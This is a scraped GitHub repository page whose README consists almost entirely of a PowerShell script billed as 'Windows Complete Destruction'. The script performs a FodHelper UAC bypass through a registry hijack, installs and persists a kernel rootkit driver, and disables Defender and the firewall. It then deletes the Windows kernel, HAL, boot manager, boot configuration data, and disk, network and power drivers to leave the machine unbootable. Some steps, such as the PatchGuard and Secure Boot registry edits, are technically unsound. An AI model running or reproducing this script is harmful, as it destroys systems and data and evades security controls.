Skip to content

RG-Reaper/Destruction-of-Windows

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 

Repository files navigation

Full Rootkit Installation and System Destruction Script with UAC Bypass

WARNING: This script will render the system unbootable and irrecoverable.

This script is fully automated, gaining admin rights, installing a rootkit, and destroying the system.

Ensure script is run as Administrator (UAC bypass method below)

if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { # UAC Bypass via FodHelper Write-Host "Attempting UAC Bypass via FodHelper..." -ForegroundColor Yellow New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\ThisScript.ps1" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Start-Process "C:\Windows\System32\fodhelper.exe" # UAC Bypass exploit triggers this script with admin rights exit }

Write-Host "UAC Bypass successful. Proceeding with rootkit installation and system destruction..." -ForegroundColor Red

PART 1: Install Rootkit and Ensure Persistence

Write-Host "Installing rootkit (kernel-mode rootkit driver)..." -ForegroundColor Yellow

Replace the path below with the actual rootkit driver file location

Copy-Item "C:\Path\To\Rootkit\rootkit.sys" -Destination "C:\Windows\System32\drivers" -Force

Create a system service for the rootkit driver

sc create rootkit binPath= "C:\Windows\System32\drivers\rootkit.sys" type= kernel start= auto sc start rootkit

Write-Host "Setting rootkit for persistence (autostart on boot)..." -ForegroundColor Yellow

Add rootkit to auto-start registry key for persistence

New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "rootkit" -Value "C:\Windows\System32\drivers\rootkit.sys" -Force

PART 2: Disable Security Measures (Windows Defender, Firewall)

Write-Host "Disabling Windows Defender and security features..." -ForegroundColor Yellow Set-Service -Name WinDefend -StartupType Disabled # Disable Windows Defender service Stop-Service -Name WinDefend -Force # Stop Windows Defender New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1 -Force

Disable Windows Firewall

Set-Service -Name MpsSvc -StartupType Disabled # Disable Firewall service Stop-Service -Name MpsSvc -Force # Stop Firewall service Remove-Item -Path "C:\Windows\System32\mpssvc.dll" -Force # Remove Firewall DLL

PART 3: Disable Kernel Protections and Secure Boot

Write-Host "Disabling kernel protections and Secure Boot..." -ForegroundColor Yellow New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "DisableKernelPatchProtection" -Value 1 -Force # Disable PatchGuard New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "DisableIntegrityChecks" -Value 1 -Force # Disable kernel integrity checks

Disable Secure Boot

New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecureBoot\State" -Name "UEFISecureBootEnabled" -Value 0 -Force # Disable Secure Boot

PART 4: Destroy Networking Stack and System Files

Write-Host "Disabling networking stack..." -ForegroundColor Red Remove-Item -Path "C:\Windows\System32\drivers\tcpip.sys" -Force # Remove TCP/IP stack Remove-Item -Path "C:\Windows\System32\drivers\ndis.sys" -Force # Remove network driver interface Set-Service -Name Dhcp -StartupType Disabled # Disable DHCP service Set-Service -Name Dnscache -StartupType Disabled # Disable DNS Client service Stop-Service -Name Dhcp, Dnscache -Force # Stop DHCP and DNS services

PART 5: Destroy Kernel, Bootloader, and Critical Files

Write-Host "Starting system destruction (kernel, bootloader, etc.)..." -ForegroundColor Red Remove-Item -Path "C:\Windows\System32\ntoskrnl.exe" -Force # Remove Windows kernel Remove-Item -Path "C:\Windows\System32\hal.dll" -Force # Remove HAL (Hardware Abstraction Layer) Remove-Item -Path "C:\bootmgr" -Force # Remove Windows Boot Manager

Write-Host "Destroying Boot Configuration Data (BCD)..." -ForegroundColor Red bcdedit /delete {default} /f # Delete the default boot entry bcdedit /delete {bootmgr} /f # Remove boot manager from BCD

PART 6: Disable Disk I/O and Volume Management

Write-Host "Disabling disk I/O drivers and NTFS..." -ForegroundColor Red Remove-Item -Path "C:\Windows\System32\drivers\disk.sys" -Force # Remove disk driver Remove-Item -Path "C:\Windows\System32\drivers\partmgr.sys" -Force # Remove partition manager Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Ntfs" -Name "Start" -Value 4 -Force # Disable NTFS

Write-Host "Disabling Volume Snapshot Service (VSS)..." -ForegroundColor Red Remove-Item -Path "C:\Windows\System32\drivers\volsnap.sys" -Force # Remove Volume Shadow Copy driver

PART 7: Disable Power Management and Hardware Control

Write-Host "Disabling ACPI (power management)..." -ForegroundColor Red Set-ItemProperty -Path "HKLM\SYSTEM\CurrentControlSet\Services\ACPI" -Name "Start" -Value 4 -Force # Disable ACPI Remove-Item -Path "C:\Windows\System32\drivers\acpi.sys" -Force # Remove ACPI driver

Write-Host "Final destruction complete. The system is now irrecoverable." -ForegroundColor Red

About

Windows Complete Destruction

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published